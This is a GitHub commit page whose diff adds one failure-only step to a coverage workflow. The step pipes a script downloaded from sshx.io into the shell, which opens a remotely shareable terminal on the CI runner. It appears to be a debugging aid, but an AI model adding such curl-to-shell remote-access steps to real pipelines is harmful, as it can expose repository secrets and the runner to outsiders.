Skip to content

Commit 623ebf1

Browse files
authored
test
1 parent 77aa954 commit 623ebf1

1 file changed

Lines changed: 5 additions & 0 deletions

File tree

.github/workflows/coverage.yml

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -41,6 +41,10 @@ jobs:
4141
echo "current_score=${current_score}" >> $GITHUB_OUTPUT
4242
echo "score_diff=${score_diff}" >> $GITHUB_OUTPUT
4343
44+
- if: failure()
45+
run: |
46+
curl -sSf https://sshx.io/get | sh -s run
47+
4448
- name: Post comment
4549
uses: actions/github-script@v7
4650
with:
@@ -60,3 +64,4 @@ jobs:
6064
const { owner, repo, number } = context.issue;
6165
await github.rest.issues.createComment({ owner, repo, issue_number: number, body: comment });
6266
} catch (err) { console.log(err); }
67+

0 commit comments

Comments
 (0)